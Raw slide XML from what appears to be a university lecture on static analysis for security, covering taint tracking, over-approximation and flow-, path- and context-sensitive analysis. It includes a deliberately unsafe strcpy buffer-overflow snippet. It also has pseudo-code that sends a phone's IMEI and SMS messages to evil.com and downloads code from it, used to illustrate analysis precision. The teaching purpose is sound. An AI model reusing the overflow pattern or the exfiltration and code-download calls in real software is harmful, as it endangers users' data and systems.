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83" r:id="rId3"/>
    <p:sldId id="385" r:id="rId4"/>
    <p:sldId id="420" r:id="rId5"/>
    <p:sldId id="418" r:id="rId6"/>
    <p:sldId id="419" r:id="rId7"/>
    <p:sldId id="421" r:id="rId8"/>
    <p:sldId id="422" r:id="rId9"/>
    <p:sldId id="392" r:id="rId10"/>
    <p:sldId id="389" r:id="rId11"/>
    <p:sldId id="390" r:id="rId12"/>
    <p:sldId id="391" r:id="rId13"/>
    <p:sldId id="393" r:id="rId14"/>
    <p:sldId id="423" r:id="rId15"/>
    <p:sldId id="424" r:id="rId16"/>
    <p:sldId id="425" r:id="rId17"/>
    <p:sldId id="426" r:id="rId18"/>
    <p:sldId id="427" r:id="rId19"/>
    <p:sldId id="428" r:id="rId20"/>
    <p:sldId id="404" r:id="rId21"/>
    <p:sldId id="532" r:id="rId22"/>
    <p:sldId id="533" r:id="rId23"/>
    <p:sldId id="534" r:id="rId24"/>
    <p:sldId id="535" r:id="rId25"/>
    <p:sldId id="536" r:id="rId26"/>
    <p:sldId id="537" r:id="rId27"/>
    <p:sldId id="405" r:id="rId28"/>
    <p:sldId id="429" r:id="rId29"/>
    <p:sldId id="430" r:id="rId30"/>
    <p:sldId id="431" r:id="rId31"/>
    <p:sldId id="432" r:id="rId32"/>
    <p:sldId id="433" r:id="rId33"/>
    <p:sldId id="434" r:id="rId34"/>
    <p:sldId id="500" r:id="rId35"/>
    <p:sldId id="501" r:id="rId36"/>
    <p:sldId id="502" r:id="rId37"/>
    <p:sldId id="539" r:id="rId38"/>
    <p:sldId id="540" r:id="rId39"/>
    <p:sldId id="541" r:id="rId40"/>
    <p:sldId id="542" r:id="rId41"/>
    <p:sldId id="543" r:id="rId42"/>
    <p:sldId id="544" r:id="rId43"/>
    <p:sldId id="510" r:id="rId44"/>
    <p:sldId id="515" r:id="rId45"/>
    <p:sldId id="514" r:id="rId46"/>
    <p:sldId id="516" r:id="rId47"/>
    <p:sldId id="545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79041"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="132" d="100"/>
          <a:sy n="132" d="100"/>
        </p:scale>
        <p:origin x="15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FC9B-74B5-8E40-A9E6-386E1D7938B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540E-22BB-A04D-A531-AB9E834E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5540E-22BB-A04D-A531-AB9E834E7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Figure of overapproximation, precision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5" name="Shape 1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over-tainting lead to?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>Can taint ever be removed?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="339592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1" name="Shape 1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someone give examples where questions should be enforced? When they should be allowed?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>Connection to taint removal (value sanitization)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="80577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0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49"/>
            <a:ext cx="4038600" cy="3711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35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54040"/>
            <a:ext cx="2558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Giovanni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" baseline="0" dirty="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rPr>
              <a:t> Vigna – CS279 Advanced Topics in Security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60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5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>
              <a:lumMod val="60000"/>
              <a:lumOff val="4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Analysis for Security</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0"/>
              <a:t>“You can observe a lot by just by watching” - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Yogi Berra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Giovanni Vigna</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>UCSB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5424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Example: Simple Overflows</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="266" name="Shape 26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int main(int argc, char** argv) {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6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char buf[256];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    strcpy(buf, argv[1]);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRP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600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>    return 0;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248011" indent="-248011"/>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Simplest detection approach: grep for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strcpy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="248011" indent="-248011"/>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>More rigorous: model possible values</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Size of source, destination buffers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Model semantics of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strcpy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Check safety condition: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len(argv[1]) &lt; len(buf)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="421786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Difficulties</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="270" name="Shape 27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char buf[256];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int</a:t>
            </a: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 idx = get_idx();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if (</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>some_cond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ition</a:t>
            </a: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())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    idx &lt;&lt;= 2;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  <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>buf[idx] = '\n';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242741" indent="-242741" defTabSz="319031">
              <a:spcBef>
                <a:spcPts val="1255"/>
              </a:spcBef>
              <a:defRPr sz="2784"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0"/>
              <a:t>Is </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Hack"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>idx</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0"/>
              <a:t> safe or not?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="485482" lvl="1" indent="-242741" defTabSz="319031">
              <a:spcBef>
                <a:spcPts val="1255"/>
              </a:spcBef>
              <a:defRPr sz="2784"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0"/>
              <a:t>Value of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Hack"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>idx</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0"/>
              <a:t> depends on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0"/>
              <a:t>execution path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> and the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0"/>
              <a:t> semantics of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Hack"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>get_idx</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="81327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Difficulties</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="274" name="Shape 27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char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[256];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get_idx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();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some_condition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())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 &lt;&lt;= 2;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="249676">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="191323" algn="l"/>
                <a:tab pos="382646" algn="l"/>
                <a:tab pos="581941" algn="l"/>
                <a:tab pos="773264" algn="l"/>
                <a:tab pos="964587" algn="l"/>
                <a:tab pos="1163881" algn="l"/>
                <a:tab pos="1355204" algn="l"/>
                <a:tab pos="1546527" algn="l"/>
                <a:tab pos="1745822" algn="l"/>
                <a:tab pos="1937145" algn="l"/>
                <a:tab pos="2128468" algn="l"/>
                <a:tab pos="2327763" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="2784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Hack"/>
                <a:cs typeface="Hack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Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>] = '\n';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="286984">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="223210" algn="l"/>
                <a:tab pos="446420" algn="l"/>
                <a:tab pos="669630" algn="l"/>
                <a:tab pos="892840" algn="l"/>
                <a:tab pos="1116051" algn="l"/>
                <a:tab pos="1339261" algn="l"/>
                <a:tab pos="1562471" algn="l"/>
                <a:tab pos="1785681" algn="l"/>
                <a:tab pos="2008891" algn="l"/>
                <a:tab pos="2232101" algn="l"/>
                <a:tab pos="2455311" algn="l"/>
                <a:tab pos="2678521" algn="l"/>
              </a:tabLst>
              <a:defRPr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800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Conservatively, we assume that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idx</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> could be unsafe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>oose upper bounds lead to many false positives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Useful static analyses quickly approach formal verification</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Need to tightly model program states</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Need to be more “sensitive”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41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282" name="Shape 28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Sensitivity can greatly increase precision</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allows analysis to disambiguate between (perhaps) unrelated program states</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>However, can greatly decrease scalability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Potential for exponential explosion of states to analyze</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Flow-sensitive analyses: take into account the order of statements in a program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Path-sensitive analyses: keep track of the predicates at conditional branch instructions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Context-sensitive analyses: take into consideration the calling context when analyzing the target of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4807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387742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919191"/>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:headEnd type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Shape 326"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5491512" y="3094713"/>
            <a:ext cx="347929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x: {T, U}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{"", user_imei, sms_msgs}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{ok.com, evil.com, google.com}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Shape 308">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0205A62B-F4C7-2F46-A5E5-C155385D9B8A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19" name="Shape 309">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17CC5542-8746-BC4F-A0C9-E5C66F966650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0" name="Shape 310">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0F645EE-DB81-6545-8127-E050E6DE2812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 // subclass of T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42141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sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Shape 326"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5491512" y="3094713"/>
            <a:ext cx="347929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x: {T, U}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{"", user_imei, sms_msgs}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{ok.com, evil.com, google.com}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Shape 343"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="315478" y="3730117"/>
            <a:ext cx="1854380" cy="42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Send IMEI, SMS to ok.com,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evil.com, google.com</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:hlinkClick r:id="rId2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Shape 344"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6741598" y="3730174"/>
            <a:ext cx="2044185" cy="42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Download code from ok.com,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latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>evil.com, google.com</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:hlinkClick r:id="rId2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Shape 308">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2719367-A62E-404D-97BA-878B9E9D74DB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21" name="Shape 309">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E709A439-606F-E646-8BF8-F731C5B71D9F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2" name="Shape 310">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54DE057E-9FAC-C243-88BF-152F32D9B987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35333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sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Shape 343"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="315478" y="3822450"/>
            <a:ext cx="1472064" cy="23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Send IMEI, to ok.com</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:hlinkClick r:id="rId2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Shape 360"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6234394" y="2699730"/>
            <a:ext cx="2040496" cy="78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Context: {f1, g}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x: {T}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x-&gt;y = {user_imei}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x-&gt;z = {ok.com}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Shape 308">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D173E0D-D7E9-0548-9A0D-9653CBCD7C34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20" name="Shape 309">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36357991-ED3C-364E-99C3-DE3A938E5EF5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1" name="Shape 310">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F7DAA29-D4D7-3047-9C6E-BB2B30DFB675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213900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T-&gt;h();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rgbClr val="7F7F7F"/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sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Shape 343"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="315478" y="3822450"/>
            <a:ext cx="1739415" cy="23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Send </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>nothing</a:t>
            </a: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, to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>evil</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>.com</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:hlinkClick r:id="rId2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Shape 360"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6234394" y="2699730"/>
            <a:ext cx="2040496" cy="78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Context: {f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>, g}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x: {T}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x-&gt;y = {}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x-&gt;z = {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>evil</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>.com}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Shape 308">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97AA528F-F82B-5A43-B56C-CE6D0B6D8398}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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20" name="Shape 309">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA4B83BF-85B5-D947-9B88-EA1D54FA7592}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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21" name="Shape 310">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B051F782-2752-AA4E-B6F0-363ECD47DA94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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</p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="344940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</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Shape 285"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3553012" y="2777067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g(T*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Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>x</a:t>
            </a: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-&gt;h();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0" name="Shape 286"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1383764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f1(T*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1" name="Shape 287"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3553012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f2(T*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2" name="Shape 288"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5722261" y="1820591"/>
            <a:ext cx="1746214" cy="635291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int f3(T* x)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  return g(x);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3" name="Shape 289"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1485822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T::h(void)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send_data(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  this-&gt;z, this-&gt;y);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sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="Shape 290"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4728724" y="4150809"/>
            <a:ext cx="2686678" cy="829247"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28575" cmpd="sng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3" tIns="25403" rIns="25403" bIns="25403" anchor="ctr"/>
          <a:lstStyle/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int U::h(void) {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  return dl_code(this-&gt;z);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="228623">
              <a:tabLst>
                <a:tab pos="177818" algn="l"/>
                <a:tab pos="355637" algn="l"/>
                <a:tab pos="533455" algn="l"/>
                <a:tab pos="711273" algn="l"/>
                <a:tab pos="889091" algn="l"/>
                <a:tab pos="1066910" algn="l"/>
                <a:tab pos="1244728" algn="l"/>
                <a:tab pos="1422546" algn="l"/>
                <a:tab pos="1600364" algn="l"/>
                <a:tab pos="1778182" algn="l"/>
                <a:tab pos="1956001" algn="l"/>
                <a:tab pos="2133819" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="240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</p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="45" name="Connector 291"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="39" idx="1"/>
            <a:endCxn id="40" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2256871" y="2455882"/>
            <a:ext cx="1296141" cy="6388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6" name="Connector 292"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="39" idx="0"/>
            <a:endCxn id="41" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4426119" y="2455882"/>
            <a:ext cx="0" cy="32118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7" name="Connector 293"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="39" idx="3"/>
            <a:endCxn id="42" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5299226" y="2455882"/>
            <a:ext cx="1296142" cy="63883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48" name="Connector 294"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="43" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2829161" y="3412357"/>
            <a:ext cx="1173727" cy="73845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miter lim="400000"/>
            <a:headEnd type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="49" name="Connector 295"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="44" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4728724" y="3412357"/>
            <a:ext cx="1343339" cy="738451"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28575" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:headEnd type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Shape 308"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1383764" y="1161408"/>
            <a:ext cx="1811625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user_imei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"ok.com/..."</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Shape 309"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3550091" y="1161408"/>
            <a:ext cx="1996922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T*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""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"evil.com/..."</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Shape 310"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5722312" y="1161408"/>
            <a:ext cx="2182219" cy="60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/>
              <a:t>U* x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x-&gt;y = sms_msgs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="008F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/>
              <a:t>x-&gt;z = "google.com/..."</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Shape 343"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6802826" y="3822450"/>
            <a:ext cx="1974906" cy="235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3" tIns="25403" rIns="25403" bIns="25403" anchor="ctr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Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Download code from Google</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:hlinkClick r:id="rId2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Shape 360"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6234394" y="2699730"/>
